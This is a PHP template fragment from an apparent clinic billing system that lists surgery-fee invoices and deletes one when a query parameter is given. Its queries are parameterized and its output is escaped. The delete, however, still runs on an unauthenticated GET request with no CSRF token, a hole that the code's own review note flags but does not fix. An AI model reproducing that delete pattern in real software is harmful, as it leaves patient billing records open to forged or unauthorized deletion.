 <!-- /.card-header -->
            
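                <table class="table table-bordered table-hover">

                  <tr>
                    <th><strong>Date &amp; Time <br>Towards </strong></th>
                    <th><strong>Procedure fees <br> &amp; Status</strong></th>
                    <th><strong>Assisted by </strong></th>
                    <th><strong><section class="content-header">Action</section> </strong></th>
                  </tr>

<?php
/*
 * Procedure-charges table body.
 *
 * Reads the `prescriptionid` and `patientid` query parameters and prints one
 * table row per `patient_invace` record whose discription is 'surgury_fees'
 * for that prescription. When `invoiceid` is present in the query string the
 * matching `patient_invace` row is deleted first and the browser is sent back
 * to billingset.php.
 *
 * Security notes:
 *  - Every request value is bound as a statement parameter; none is
 *    concatenated into SQL text.
 *  - Every value written into the page is escaped for the context it lands in
 *    (HTML text/attribute, URL query string, or JavaScript string).
 *  - NOTE(review): the delete is triggered by a plain GET request, is not
 *    scoped to the current patient/prescription, and this file shows no CSRF
 *    token or authorization check. Confirm that dbconnection.php or the
 *    including page enforces an authenticated session, and move the delete to
 *    a POST handler with a per-session token.
 *  - Requires the mysqlnd driver for mysqli_stmt::get_result().
 */
include("dbconnection.php");

// Returns a query-string parameter as a string; arrays and missing keys become ''.
$getParam = static function (string $key): string {
    $value = $_GET[$key] ?? '';
    return is_scalar($value) ? (string) $value : '';
};

// Escapes a value for HTML text and quoted-attribute contexts.
$h = static function ($value): string {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

// Runs a parameterized SELECT and returns all rows (numeric and associative
// keys, matching mysqli_fetch_array). Returns [] when the statement fails.
$selectRows = static function (mysqli $db, string $sql, array $params): array {
    $rows = [];
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return $rows;
    }
    if ($params !== []) {
        // All values are bound as strings, as the original quoted literals were.
        $stmt->bind_param(str_repeat('s', count($params)), ...$params);
    }
    if ($stmt->execute()) {
        $result = $stmt->get_result();
        if ($result !== false) {
            while ($row = $result->fetch_array()) {
                $rows[] = $row;
            }
            $result->free();
        }
    }
    $stmt->close();
    return $rows;
};

$prescriptionId = $getParam('prescriptionid');
$patientId = $getParam('patientid');

if (isset($_GET['invoiceid'])) {
    $deleted = false;
    $deleteStmt = $con->prepare('DELETE FROM patient_invace WHERE invaceid = ?');
    if ($deleteStmt !== false) {
        $invoiceId = $getParam('invoiceid');
        $deleteStmt->bind_param('s', $invoiceId);
        $deleted = $deleteStmt->execute();
        $deleteStmt->close();
    }
    if ($deleted) {
        $redirect = 'billingset.php?' . http_build_query(
            ['prescriptionid' => $prescriptionId, 'patientid' => $patientId],
            '',
            '&'
        );
        echo "<script>alert('Delete successfully..');</script>";
        // json_encode with the HEX flags yields a JavaScript string literal that
        // cannot close the <script> element or the string itself.
        echo '<script>window.location='
            . json_encode($redirect, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)
            . '</script>';
    }
}

// Map of surgery id => treatment name for this patient's prescription.
$treatmentArray = [];
$trackerRows = $selectRows(
    $con,
    'SELECT * FROM surgerytracker WHERE prescriptionid = ? AND patientid = ?',
    [$prescriptionId, $patientId]
);
foreach ($trackerRows as $re) {
    $treatmentRows = $selectRows(
        $con,
        'SELECT * FROM list_tretment WHERE trid = ?',
        [(string) $re['surgery']]
    );
    foreach ($treatmentRows as $re1) {
        $treatmentArray[$re['surgery']] = $re1['tratment'];
    }
}

$patientRows = $selectRows(
    $con,
    'SELECT * FROM addaspatient WHERE patientid = ? AND prescriptionid = ?',
    [$patientId, $prescriptionId]
);

if ($patientRows !== []) {
    // Only the first matching addaspatient row is used.
    $rs = $patientRows[0];

    $invoiceRows = $selectRows(
        $con,
        "SELECT * FROM patient_invace WHERE prescriptionid = ? AND discription = 'surgury_fees'",
        [(string) $rs['prescriptionid']]
    );

    // The user lookup depends only on $rs, so it is done once rather than
    // once per invoice row.
    $userRows = $selectRows(
        $con,
        'SELECT * FROM site_users WHERE userno = ?',
        [(string) $rs['entered_by']]
    );

    foreach ($invoiceRows as $rsp) {
        foreach ($userRows as $rsn) {
            // Empty string when the invoice's pagetype has no (non-empty) treatment name.
            $treatmentName = !empty($treatmentArray[$rsp['pagetype']])
                ? $treatmentArray[$rsp['pagetype']]
                : "";
            $pricedue = $rsp['pricetotal'];
            $usertype = $rsp['status'];

            // NOTE(review): `link` is stored data. Escaping prevents attribute
            // breakout only; confirm it is always a relative application URL.
            $viewUrl = $rsp['link'] . '&treatmentName=' . urlencode((string) $treatmentName);

            // Built inside PHP so the ids are actually substituted into the URL.
            $deleteUrl = 'billingset.php?' . http_build_query(
                [
                    'invoiceid' => $rsp['invaceid'],
                    'prescriptionid' => $prescriptionId,
                    'patientid' => $patientId,
                ],
                '',
                '&'
            );

            echo '<tbody><tr>';
            echo '<td>&nbsp;' . $h($rsp['created_at']) . ' <br>' . $h($rsp['discription'])
                . ' <br> ' . $h($treatmentName) . '</td>';
            echo '<td>&nbsp;' . $h($rsp['pricetotal']) . ' <br>';
            if ($usertype === 'Paid') {
                echo 'Paid';
            } else {
                echo 'Due <b>' . $h($pricedue) . '</b>';
            }
            echo '</td>';
            echo '<td>&nbsp;' . $h($rsn['name']) . '</td>';
            echo "<td><section class='content-header'>";
            echo "<a href='" . $h($viewUrl) . "'>"
                . "<i class='fa fa-eye' aria-hidden='true' style='font-size:20px;'></i></a>";
            echo "<a href='" . $h($deleteUrl) . "' onclick=\"return confirm('Are you sure?')\">"
                . "<i class='fa fa-trash-o' aria-hidden='true'"
                . " style='font-size:20px;color:#b30808; margin-left:5px;'></i></a>";
            echo '</td></tr></tbody>';
        }
    }
}
?>
        </table>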
        <br>
    <a href="#">

     
 
